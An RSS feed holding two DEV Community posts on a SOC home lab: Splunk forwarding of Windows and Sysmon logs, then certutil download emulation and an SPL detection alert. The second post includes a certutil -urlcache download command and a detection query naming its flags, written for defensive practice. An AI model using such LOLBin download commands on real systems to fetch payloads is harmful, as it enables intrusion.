<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Samuel Kolade</title>
    <description>The latest articles on DEV Community by Samuel Kolade (@samuel_kolade).</description>
    <link>https://dev.to/samuel_kolade</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F4084117%2Fd9ecf6cb-8c86-4be6-9840-33cd602115d3.jpg</url>
      <title>DEV Community: Samuel Kolade</title>
      <link>https://dev.to/samuel_kolade</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/samuel_kolade"/>
    <language>en</language>
    <item>
      <title>Building a SOC Home Lab II: Local Threat Emulation &amp; SPL Detection Engineering</title>
      <dc:creator>Samuel Kolade</dc:creator>
      <pubDate>Sun, 04 Oct 2026 21:13:04 +0000</pubDate>
      <link>https://dev.to/samuel_kolade/building-a-soc-home-lab-ii-local-threat-emulation-spl-detection-engineering-3cbd</link>
      <guid>https://dev.to/samuel_kolade/building-a-soc-home-lab-ii-local-threat-emulation-spl-detection-engineering-3cbd</guid>
      <description>&lt;p&gt;In Part I of this series, I laid the foundation for this SOC home lab: a Windows 11 endpoint (WIN11-TARGET) and a Xubuntu SIEM (soc-siem), with Sysmon and PowerShell logging configured and routed into Splunk through the Universal Forwarder.&lt;/p&gt;

&lt;p&gt;Collecting logs is only half the work. This phase is about actually using that telemetry, simulating a local threat, writing a detection rule against it, and verifying the whole pipeline fires correctly.&lt;/p&gt;

&lt;p&gt;Before Starting: Creating a Dedicated Index&lt;/p&gt;

&lt;p&gt;Before the detection work, I wanted Windows telemetry sitting in its own index rather than mixed into Splunk's default main. I edited inputs.conf to assign every stanza to a new index, windows:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight powershell"&gt;&lt;code&gt;&lt;span class="sh"&gt;@'
[WinEventLog://Application]
disabled = 0
index = windows

[WinEventLog://Security]
disabled = 0
index = windows

[WinEventLog://System]
disabled = 0
index = windows

[WinEventLog://Microsoft-Windows-PowerShell/Operational]
disabled = 0
index = windows

[XmlWinEventLog://Microsoft-Windows-Sysmon/Operational]
disabled = 0
index = windows
'@&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;|&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;Set-Content&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"C:\Program Files\SplunkUniversalForwarder\etc\system\local\inputs.conf"&lt;/span&gt;&lt;span class="w"&gt;

&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Feeoohak2ita63qylofuu.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Feeoohak2ita63qylofuu.png" alt="Get-Content output confirming the updated inputs.conf, all five stanzas pointing to index = windows" width="800" height="430"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Searching index=windows in Splunk came back empty. index=main still had data, which told me the new index didn't actually exist on the Splunk Enterprise side yet. Declaring an index in inputs.conf doesn't create it on its own.&lt;/p&gt;

&lt;p&gt;While sorting this out, I made two changes: I created the windows index through Splunk Web (Settings → Indexes → New Index), and I also switched the Sysmon input from WinEventLog to XmlWinEventLog, trying to rule out whether the input type itself was the problem. Looking back, the missing index was almost certainly the actual cause, Splunk drops events headed for an index that doesn't exist rather than storing them somewhere else. But the XmlWinEventLog change was already in place by the time things started working, so that's what stayed.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fevk9aoyfg73lrrvefima.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fevk9aoyfg73lrrvefima.png" alt="Splunk Web Indexes list showing the windows index, Active, with event count and recent activity" width="800" height="431"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;After creating the index, index=windows started returning results.&lt;/p&gt;

&lt;h3&gt;
  
  
  Phase 1: Local Threat Emulation (LOLBin Simulation)
&lt;/h3&gt;

&lt;p&gt;To test the SIEM, I needed realistic malicious telemetry. Attackers frequently abuse trusted, built-in Windows utilities, known as Living-off-the-Land Binaries (LOLBins), to execute attacks while blending in with normal administrative traffic.&lt;/p&gt;

&lt;p&gt;A classic example mapped to MITRE ATT&amp;amp;CK (T1105: Ingress Tool Transfer) is the abuse of certutil.exe. While normally used for certificate services, adversaries leverage its URL caching features to download malicious payloads.&lt;/p&gt;

&lt;p&gt;To simulate this on the Windows 11 endpoint, I navigated to a highly writable directory to bypass standard folder restrictions, then executed the payload download:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight powershell"&gt;&lt;code&gt;&lt;span class="n"&gt;powershell&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="nx"&gt;cd&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;C:\Users\Public&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="n"&gt;certutil.exe&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;-urlcache&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;-split&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;-f&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"http://example.com"&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;test.txt&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fz4sibwtt1eqqrh0u5sgc.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fz4sibwtt1eqqrh0u5sgc.png" alt="The Windows 11 PowerShell window showing the executed certutil command and the " width="799" height="395"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;This command reaches out to an external domain, caches the file, and drops it on disk. Sysmon and PowerShell script block logging record the process creation and command-line execution, forwarding it to Splunk.&lt;/p&gt;

&lt;h3&gt;
  
  
  Phase 2: Raw Telemetry Validation in Splunk
&lt;/h3&gt;

&lt;p&gt;Switching to the Xubuntu workstation, I needed to verify the telemetry landed and contained the artifacts needed for a detection rule.&lt;/p&gt;

&lt;p&gt;In Search &amp;amp; Reporting, I ran a broad query over the last 15 minutes:&lt;/p&gt;

&lt;p&gt;spl&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;index=windows "urlcache"
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Expanding the resulting event showed the ProcessName (certutil.exe) and the full CommandLine containing the exact execution string.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fxc0ic2fzd9oz0comty4m.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fxc0ic2fzd9oz0comty4m.png" alt="Splunk showing search result for " width="799" height="346"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fv7ywrij7vsho758cmmc5.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fv7ywrij7vsho758cmmc5.png" alt="Expanded Splunk log showing the Event ID, source, and the CommandLine field capturing the certutil arguments" width="800" height="417"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The pipeline works, but a keyword search like this isn't a detection rule.&lt;/p&gt;

&lt;h3&gt;
  
  
  Phase 3: Detection Engineering &amp;amp; SPL Refinement
&lt;/h3&gt;

&lt;p&gt;A rule that simply watches for certutil.exe would drown the SOC in false positives, since legitimate certificate operations use the same binary constantly. What actually distinguishes malicious use is the specific flags attackers rely on for payload retrieval and decoding.&lt;/p&gt;

&lt;p&gt;spl&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;index=windows certutil.exe ("-urlcache" OR "-split" OR "-f" OR "-decode")
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F72ymtn3gswmi1gr38b50.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F72ymtn3gswmi1gr38b50.png" alt="Splunk Search showing results for " width="799" height="346"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fza9r0njibofqezbvbbsl.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fza9r0njibofqezbvbbsl.png" alt="Splunk Search expanded results for " width="800" height="399"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;This narrows the results to executions attempting to download or decode files, rather than flagging every routine certutil call.&lt;/p&gt;

&lt;h3&gt;
  
  
  Phase 4: Real-Time Alerting &amp;amp; Validation
&lt;/h3&gt;

&lt;p&gt;Catching an event manually during a threat hunt is useful, but a SOC relies on automation to triage threats quickly. I converted the SPL query into an active alert.&lt;/p&gt;

&lt;p&gt;In Splunk Web:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Save As &amp;gt; Alert
Title: Suspicious CertUtil Download Flags Detected
Alert Type: Real-time
Trigger Condition: Per-Result
Trigger Actions: Add to Triggered Alerts
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fpirbwd9sy1j3k1mqesjb.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fpirbwd9sy1j3k1mqesjb.png" alt="Saving Splunk SPL query as an active alert for automated threat triage" width="800" height="430"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;I used Real-time here for testing purposes. In a production environment, scheduled searches are the more common choice, real-time search is resource-intensive and generally reserved for cases that genuinely need second-by-second detection.&lt;/p&gt;

&lt;p&gt;To validate the pipeline end to end, I returned to the Windows 11 machine and ran a slightly modified command:&lt;/p&gt;

&lt;p&gt;powershell&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;certutil.exe -urlcache -split -f "http://example.org" alert_test.txt
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Checking Activity &amp;gt; Triggered Alerts in Splunk, the rule fired as expected.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F176nxlli6mm5vsyvo342.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F176nxlli6mm5vsyvo342.png" alt="The Splunk " width="780" height="15"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fynlalnw02kxfprc1oecs.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fynlalnw02kxfprc1oecs.png" alt="The Splunk " width="797" height="145"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Conclusion &amp;amp; Next Steps
&lt;/h3&gt;

&lt;p&gt;This phase turned the lab from a log collector into something that actually filters and alerts on adversarial behavior, with a dedicated index keeping that telemetry separate from everything else flowing through Splunk.&lt;/p&gt;

&lt;p&gt;Next, I'm introducing Kali Linux to simulate remote network attacks and mapping that network-level telemetry into the same SIEM.&lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>security</category>
      <category>showdev</category>
    </item>
    <item>
      <title>Building a SOC Home Lab I: Ingesting Windows &amp; Sysmon Logs into Splunk</title>
      <dc:creator>Samuel Kolade</dc:creator>
      <pubDate>Fri, 21 Aug 2026 09:23:44 +0000</pubDate>
      <link>https://dev.to/samuel_kolade/building-a-soc-home-lab-ingesting-windows-sysmon-logs-into-splunk-ej9</link>
      <guid>https://dev.to/samuel_kolade/building-a-soc-home-lab-ingesting-windows-sysmon-logs-into-splunk-ej9</guid>
      <description>&lt;p&gt;Building a SOC lab is more useful when the components are actually configured, tested, and troubleshot rather than simply installed.&lt;/p&gt;

&lt;p&gt;For this stage of the lab, I set up a small virtualized environment in VMware Workstation: a Windows 11 endpoint feeding telemetry into Splunk Enterprise running on Xubuntu, with Sysmon added on top for more useful endpoint data. Along the way, the Universal Forwarder ran into a configuration problem that traced back to something as small as a file extension. Chasing it down taught me more about how the pipeline actually fits together than the install itself did.&lt;/p&gt;

&lt;h2&gt;
  
  
  1. Lab Architecture
&lt;/h2&gt;

&lt;p&gt;The lab currently runs on two VMs.&lt;/p&gt;

&lt;h3&gt;
  
  
  SIEM
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Xubuntu&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Hostname: &lt;code&gt;soc-siem&lt;/code&gt;&lt;br&gt;
IP address: &lt;code&gt;192.168.242.128&lt;/code&gt;&lt;br&gt;
Role: Splunk Enterprise&lt;/p&gt;

&lt;p&gt;Splunk Enterprise listens for forwarded data on TCP &lt;code&gt;9997&lt;/code&gt;.&lt;/p&gt;
&lt;h3&gt;
  
  
  Endpoint
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Windows 11&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Hostname: &lt;code&gt;WIN11-TARGET&lt;/code&gt;&lt;br&gt;
IP address: &lt;code&gt;192.168.242.129&lt;/code&gt;&lt;br&gt;
Role: Windows endpoint&lt;/p&gt;

&lt;p&gt;This VM runs the Splunk Universal Forwarder and Sysmon. The Forwarder picks up selected Windows Event Log channels and ships them to the SIEM.&lt;/p&gt;
&lt;h3&gt;
  
  
  Architecture
&lt;/h3&gt;

&lt;p&gt;I mapped the actual data flow in draw.io rather than reusing a generic SOC diagram. It only has two boxes right now, but I wanted the diagram to represent the lab as it exists, not as it will eventually look.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fawiv2l3l00s0dvedtnrx.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fawiv2l3l00s0dvedtnrx.png" alt="Architecture diagram showing a Windows 11 endpoint forwarding Windows Event Logs and Sysmon telemetry through the Splunk Universal Forwarder over TCP 9997 to a Splunk Enterprise instance on Xubuntu" width="800" height="520"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Sysmon runs alongside the standard Windows Event Log channels on the endpoint, and the Forwarder collects from both.&lt;/p&gt;
&lt;h2&gt;
  
  
  2. Installing the Splunk Universal Forwarder
&lt;/h2&gt;

&lt;p&gt;Installing the Forwarder on the Windows 11 endpoint was the easy part. During setup, I pointed it at the SIEM directly:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;192.168.242.128
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;with the receiving port:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;9997
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;At this point I hadn't actually verified the network path. I'd just assumed that because the installer accepted the IP and port without complaint, the connection would work. That assumption turned out to be correct, but it's worth calling out because it's exactly the kind of thing you shouldn't take on faith once something isn't working later.&lt;/p&gt;

&lt;h2&gt;
  
  
  3. Configuring Windows Event Log Inputs
&lt;/h2&gt;

&lt;p&gt;Installing the Forwarder doesn't mean anything gets collected until you tell it what to watch. That's handled through &lt;code&gt;inputs.conf&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;On the endpoint, I opened Notepad as Administrator and edited:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;C:\Program Files\SplunkUniversalForwarder\etc\system\local\inputs.conf
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;with these inputs:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight ini"&gt;&lt;code&gt;&lt;span class="nn"&gt;[WinEventLog://Application]&lt;/span&gt;
&lt;span class="py"&gt;disabled&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s"&gt;0&lt;/span&gt;

&lt;span class="nn"&gt;[WinEventLog://Security]&lt;/span&gt;
&lt;span class="py"&gt;disabled&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s"&gt;0&lt;/span&gt;

&lt;span class="nn"&gt;[WinEventLog://System]&lt;/span&gt;
&lt;span class="py"&gt;disabled&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s"&gt;0&lt;/span&gt;

&lt;span class="nn"&gt;[WinEventLog://Microsoft-Windows-PowerShell/Operational]&lt;/span&gt;
&lt;span class="py"&gt;disabled&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s"&gt;0&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F2heip3xq0f04k2s2txmy.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F2heip3xq0f04k2s2txmy.png" alt="Notepad window showing the contents of inputs.conf with four Windows Event Log channels enabled: Application, Security, System, and Microsoft-Windows-PowerShell/Operational" width="799" height="421"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;I saved the file, restarted the Forwarder service, and moved on, expecting to see events in Splunk shortly after.&lt;/p&gt;

&lt;h2&gt;
  
  
  4. Troubleshooting the inputs.conf.txt Problem
&lt;/h2&gt;

&lt;p&gt;I didn't see anything. No Application logs, no Security logs, nothing.&lt;/p&gt;

&lt;p&gt;My first instinct was to assume the whole setup was broken somewhere. Maybe the Forwarder wasn't actually pointed at the right indexer, maybe the receiving port wasn't open on the Xubuntu side. Rather than start changing settings at random, I worked backward through the pipeline one layer at a time.&lt;/p&gt;

&lt;h3&gt;
  
  
  Checking the network first
&lt;/h3&gt;

&lt;p&gt;Before touching any Splunk configuration, I wanted to rule out the network entirely. From an elevated PowerShell session on Windows:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight powershell"&gt;&lt;code&gt;&lt;span class="n"&gt;Test-NetConnection&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;-ComputerName&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;192.168.242.128&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;-Port&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;9997&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;TcpTestSucceeded : True
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fdjx584e00nwertk3m9de.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fdjx584e00nwertk3m9de.png" alt="PowerShell window running Test-NetConnection against 192.168.242.128 on port 9997, with output showing TcpTestSucceeded: True" width="792" height="260"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The connection was fine. Whatever was wrong, it wasn't the network, so I stopped looking there and turned to the endpoint's own configuration.&lt;/p&gt;

&lt;h3&gt;
  
  
  Finding the actual problem
&lt;/h3&gt;

&lt;p&gt;I listed the contents of the Forwarder's local config directory:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight powershell"&gt;&lt;code&gt;&lt;span class="n"&gt;Get-ChildItem&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"C:\Program Files\SplunkUniversalForwarder\etc\system\local"&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F3lz3ucdzgf46or8ldgzy.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F3lz3ucdzgf46or8ldgzy.png" alt="Windows File Explorer showing the SplunkUniversalForwarder local configuration directory, with inputs.conf.txt visible instead of the expected inputs.conf" width="800" height="255"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;There was no &lt;code&gt;inputs.conf&lt;/code&gt;. Instead there was &lt;code&gt;inputs.conf.txt&lt;/code&gt; (Notepad had quietly appended the extension when I saved), and, on top of that, a directory named &lt;code&gt;inputs.conf&lt;/code&gt; that had gotten created at some point, presumably from an earlier attempt where something tried to write to a path that didn't exist yet. Splunk had never actually been reading the file I thought I'd configured.&lt;/p&gt;

&lt;p&gt;It's a small mistake, but it's the kind that's easy to miss precisely because the file &lt;em&gt;looks&lt;/em&gt; right in the editor. Nothing about the content was wrong. The name was.&lt;/p&gt;

&lt;h3&gt;
  
  
  Fixing it
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight powershell"&gt;&lt;code&gt;&lt;span class="n"&gt;Remove-Item&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"C:\Program Files\SplunkUniversalForwarder\etc\system\local\inputs.conf"&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;-Recurse&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;-Force&lt;/span&gt;&lt;span class="w"&gt;

&lt;/span&gt;&lt;span class="n"&gt;Rename-Item&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"C:\Program Files\SplunkUniversalForwarder\etc\system\local\inputs.conf.txt"&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"inputs.conf"&lt;/span&gt;&lt;span class="w"&gt;

&lt;/span&gt;&lt;span class="n"&gt;Restart-Service&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;SplunkForwarder&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F4e7p5r64gi60ffrhaks1.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F4e7p5r64gi60ffrhaks1.png" alt="PowerShell window showing the inputs.conf.txt file renamed to inputs.conf and the SplunkForwarder service being restarted with Restart-Service" width="703" height="423"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Removed the stray directory, renamed the real config file into place, restarted the service. The fix itself took seconds. Finding it was the actual work.&lt;/p&gt;

&lt;p&gt;What stuck with me from this wasn't the rename. It was the order I worked in: check the network before assuming the SIEM is broken, check the endpoint's local config before assuming Splunk itself is misbehaving. Isolating layers instead of guessing is the difference between a five-minute fix and an afternoon of randomly changing settings.&lt;/p&gt;

&lt;h2&gt;
  
  
  5. Verifying Windows Event Log Ingestion
&lt;/h2&gt;

